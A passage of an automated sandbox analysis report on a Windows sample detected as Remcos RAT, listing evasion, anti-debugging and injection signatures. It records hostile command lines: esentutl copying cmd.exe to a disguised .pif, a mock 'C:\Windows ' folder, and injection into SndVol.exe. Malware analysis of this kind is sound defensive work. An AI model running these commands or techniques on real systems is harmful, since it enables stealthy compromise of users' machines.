              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeCode function: 0_2_02D4AB1C GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_02D4AB1C
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\SndVol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Dlaybpxl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Dlaybpxl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Dlaybpxl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\Dlaybpxl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              barindex
              Delayed program exit found
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 6_2_0292E54F Sleep,ExitProcess,6_2_0292E54F
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 19_2_0294E54F Sleep,ExitProcess,19_2_0294E54F
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,6_2_029398C2
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,19_2_029598C2
              Source: C:\Windows\SysWOW64\SndVol.exeWindow / User API: threadDelayed 516Jump to behavior
              Source: C:\Windows\SysWOW64\SndVol.exeWindow / User API: threadDelayed 9477Jump to behavior
              Source: C:\Windows\SysWOW64\SndVol.exeAPI coverage: 8.9 %
              Source: C:\Users\Public\alpha.pifAPI coverage: 6.3 %
              Source: C:\Users\Public\alpha.pifAPI coverage: 7.9 %
              Source: C:\Users\Public\Libraries\Dlaybpxl.PIFAPI coverage: 9.0 %
              Source: C:\Windows\SysWOW64\SndVol.exeAPI coverage: 4.6 %
              Source: C:\Windows\SysWOW64\SndVol.exe TID: 1584Thread sleep count: 516 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\SndVol.exe TID: 1584Thread sleep time: -1548000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\SndVol.exe TID: 1584Thread sleep count: 9477 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\SndVol.exe TID: 1584Thread sleep time: -28431000s >= -30000sJump to behavior
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Users\Public\xpha.pifLast function: Thread delayed
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeCode function: 0_2_02D35908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,0_2_02D35908
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 6_2_0292B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,6_2_0292B335
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 6_2_0293B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,6_2_0293B42F
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 6_2_0296D5E9 FindFirstFileExA,6_2_0296D5E9
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 6_2_0292B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,6_2_0292B53A
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 6_2_02927A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,6_2_02927A8C
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 6_2_02926AC2 FindFirstFileW,FindNextFileW,6_2_02926AC2
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 6_2_029289A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,6_2_029289A9
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 6_2_02938C69 FindFirstFileW,FindNextFileW,FindNextFileW,6_2_02938C69
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 6_2_02928DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,6_2_02928DA7
              Source: C:\Users\Public\alpha.pifCode function: 9_2_00E40207 FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,9_2_00E40207
              Source: C:\Users\Public\alpha.pifCode function: 9_2_00E4589A FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,9_2_00E4589A
              Source: C:\Users\Public\alpha.pifCode function: 9_2_00E44EC1 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,9_2_00E44EC1
              Source: C:\Users\Public\alpha.pifCode function: 9_2_00E53E66 FindFirstFileW,FindNextFileW,FindClose,9_2_00E53E66
              Source: C:\Users\Public\alpha.pifCode function: 9_2_00E3532E GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,??_V@YAXPAX@Z,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose,9_2_00E3532E
              Source: C:\Users\Public\alpha.pifCode function: 11_2_00E4589A FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,11_2_00E4589A
              Source: C:\Users\Public\alpha.pifCode function: 11_2_00E40207 FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,11_2_00E40207
              Source: C:\Users\Public\alpha.pifCode function: 11_2_00E44EC1 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,11_2_00E44EC1
              Source: C:\Users\Public\alpha.pifCode function: 11_2_00E53E66 FindFirstFileW,FindNextFileW,FindClose,11_2_00E53E66
              Source: C:\Users\Public\alpha.pifCode function: 11_2_00E3532E GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,??_V@YAXPAX@Z,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose,11_2_00E3532E
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 19_2_0294B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,19_2_0294B335
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 19_2_0295B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,19_2_0295B42F
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 19_2_0298D5E9 FindFirstFileExA,19_2_0298D5E9
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 19_2_0294B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,19_2_0294B53A
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 19_2_02947A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,19_2_02947A8C
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 19_2_02946AC2 FindFirstFileW,FindNextFileW,19_2_02946AC2
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 19_2_029489A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,19_2_029489A9
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 19_2_02958C69 FindFirstFileW,FindNextFileW,FindNextFileW,19_2_02958C69
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 19_2_02948DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,19_2_02948DA7
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 6_2_02926F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,6_2_02926F06
              Source: jW3NEKvxH1.exe, 00000000.00000002.2265349899.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2265349899.00000000007E3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: xpha.pif, 0000000C.00000002.2390568725.0000000002E8B000.00000004.00000020.00020000.00000000.sdmp, Dlaybpxl.PIF, 0000000F.00000002.2410857467.00000000006EF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: SndVol.exe, 00000006.00000002.4603655140.0000000000607000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllRR
              Source: Dlaybpxl.PIF, 00000017.00000002.2476572161.00000000007E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllvv
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeAPI call chain: ExitProcess graph end nodegraph_0-77656
              Source: C:\Windows\SysWOW64\SndVol.exeAPI call chain: ExitProcess graph end nodegraph_6-47291
              Source: C:\Users\Public\Libraries\Dlaybpxl.PIFAPI call chain: ExitProcess graph end node

              Anti Debugging

              barindex
              Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeCode function: 0_2_02D4F744 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent,0_2_02D4F744
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\Public\Libraries\Dlaybpxl.PIFProcess queried: DebugPortJump to behavior
              Source: C:\Users\Public\Libraries\Dlaybpxl.PIFProcess queried: DebugPort
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 6_2_0295A65D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_0295A65D
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeCode function: 0_2_02D4894C LoadLibraryW,GetProcAddress,FreeLibrary,0_2_02D4894C
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeCode function: 0_2_02DF9AE4 mov eax, dword ptr fs:[00000030h]0_2_02DF9AE4
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 6_2_02962554 mov eax, dword ptr fs:[00000030h]6_2_02962554
              Source: C:\Users\Public\alpha.pifCode function: 9_2_00E5C1FA mov eax, dword ptr fs:[00000030h]9_2_00E5C1FA
              Source: C:\Users\Public\alpha.pifCode function: 11_2_00E5C1FA mov eax, dword ptr fs:[00000030h]11_2_00E5C1FA
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 19_2_02982554 mov eax, dword ptr fs:[00000030h]19_2_02982554
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 6_2_02930B19 GetNativeSystemInfo,GetProcessHeap,HeapAlloc,SetLastError,SetLastError,6_2_02930B19
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 6_2_02954168 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_02954168
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 6_2_0295A65D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_0295A65D
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 6_2_02953B44 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_02953B44
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 6_2_02953CD7 SetUnhandledExceptionFilter,6_2_02953CD7
              Source: C:\Users\Public\alpha.pifCode function: 9_2_00E46EC0 SetUnhandledExceptionFilter,9_2_00E46EC0
              Source: C:\Users\Public\alpha.pifCode function: 9_2_00E46B40 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_00E46B40
              Source: C:\Users\Public\alpha.pifCode function: 11_2_00E46EC0 SetUnhandledExceptionFilter,11_2_00E46EC0
              Source: C:\Users\Public\alpha.pifCode function: 11_2_00E46B40 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_00E46B40
              Source: C:\Users\Public\xpha.pifCode function: 12_2_00843600 SetUnhandledExceptionFilter,12_2_00843600
              Source: C:\Users\Public\xpha.pifCode function: 12_2_00843470 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_00843470
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 19_2_02974168 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,19_2_02974168
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 19_2_0297A65D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_0297A65D
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 19_2_02973B44 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_02973B44
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 19_2_02973CD7 SetUnhandledExceptionFilter,19_2_02973CD7

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Early bird code injection technique detected
              Source: C:\Users\Public\Libraries\Dlaybpxl.PIFProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\colorcpl.exe
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\SndVol.exeJump to behavior
              Source: C:\Users\Public\Libraries\Dlaybpxl.PIFProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\SndVol.exeJump to behavior
              Allocates memory in foreign processes
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeMemory allocated: C:\Windows\SysWOW64\SndVol.exe base: 2920000 protect: page execute and read and writeJump to behavior
              Source: C:\Users\Public\Libraries\Dlaybpxl.PIFMemory allocated: C:\Windows\SysWOW64\SndVol.exe base: 2940000 protect: page execute and read and writeJump to behavior
              Source: C:\Users\Public\Libraries\Dlaybpxl.PIFMemory allocated: C:\Windows\SysWOW64\colorcpl.exe base: 2460000 protect: page execute and read and write
              Drops or copies cmd.exe with a different name (likely to bypass HIPS)
              Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pifJump to dropped file
              Queues an APC in another process (thread injection)
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeThread APC queued: target process: C:\Windows\SysWOW64\SndVol.exeJump to behavior
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe6_2_02930F36
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe19_2_02950F36
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 6_2_02938754 mouse_event,6_2_02938754
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeProcess created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exeJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /oJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /oJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows " Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64" Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c del "C:\Users\Public\xpha.pif" Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \SysWOW64Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \" Jump to behavior
              Source: C:\Users\Public\alpha.pifProcess created: C:\Users\Public\xpha.pif C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10Jump to behavior
              Source: C:\Users\Public\Libraries\Dlaybpxl.PIFProcess created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exeJump to behavior
              Source: C:\Users\Public\Libraries\Dlaybpxl.PIFProcess created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeCode function: 0_2_02DEB39A cpuid 0_2_02DEB39A
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,0_2_02D35ACC
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeCode function: GetLocaleInfoA,0_2_02D3A7C4
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeCode function: GetLocaleInfoA,0_2_02D3A810
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeCode function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,0_2_02D35BD8
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: GetLocaleInfoW,6_2_029712EA
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,6_2_029713B7
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: GetLocaleInfoW,6_2_029710BA
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: EnumSystemLocalesW,6_2_029670AE
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,6_2_029711E3
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: GetLocaleInfoA,6_2_0292E679
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: GetLocaleInfoW,6_2_02967597
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,6_2_02970A7F
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,6_2_02970E6A
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: EnumSystemLocalesW,6_2_02970CF7
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: EnumSystemLocalesW,6_2_02970DDD
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: EnumSystemLocalesW,6_2_02970D42
              Source: C:\Users\Public\alpha.pifCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,9_2_00E38572
              Source: C:\Users\Public\alpha.pifCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,GetDateFormatW,memmove,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,GetLastError,realloc,9_2_00E36854
              Source: C:\Users\Public\alpha.pifCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,9_2_00E39310
              Source: C:\Users\Public\alpha.pifCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,11_2_00E38572
              Source: C:\Users\Public\alpha.pifCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,GetDateFormatW,memmove,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,GetLastError,realloc,11_2_00E36854
              Source: C:\Users\Public\alpha.pifCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,11_2_00E39310
              Source: C:\Users\Public\Libraries\Dlaybpxl.PIFCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,15_2_02E25ACC
              Source: C:\Users\Public\Libraries\Dlaybpxl.PIFCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,15_2_02E25BD7
              Source: C:\Users\Public\Libraries\Dlaybpxl.PIFCode function: GetLocaleInfoA,15_2_02E2A810
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: GetLocaleInfoW,19_2_029912EA
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,19_2_029913B7
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: GetLocaleInfoW,19_2_029910BA
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: EnumSystemLocalesW,19_2_029870AE
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,19_2_029911E3
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: GetLocaleInfoA,19_2_0294E679
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: GetLocaleInfoW,19_2_02987597
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,19_2_02990A7F
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,19_2_02990E6A
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: EnumSystemLocalesW,19_2_02990CF7
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: EnumSystemLocalesW,19_2_02990DDD
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: EnumSystemLocalesW,19_2_02990D42
              Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\Public\alpha.pifQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeCode function: 0_2_02D3920C GetLocalTime,0_2_02D3920C
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 6_2_0293A7A2 GetComputerNameExW,GetUserNameW,6_2_0293A7A2
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 6_2_0296800F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,6_2_0296800F
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeCode function: 0_2_02D3B78C GetVersionExA,0_2_02D3B78C
              Source: C:\Windows\SysWOW64\SndVol.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: cmdagent.exe
              Source: jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: quhlpsvc.exe
              Source: jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: avgamsvr.exe
              Source: jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: TMBMSRV.exe
              Source: jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: Vsserv.exe
              Source: jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: avgupsvc.exe
              Source: jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: avgemc.exe
              Source: jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: MsMpEng.exe

              Stealing of Sensitive Information

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: 19.2.SndVol.exe.2940000.0.unpack, type: UNPACKEDPE
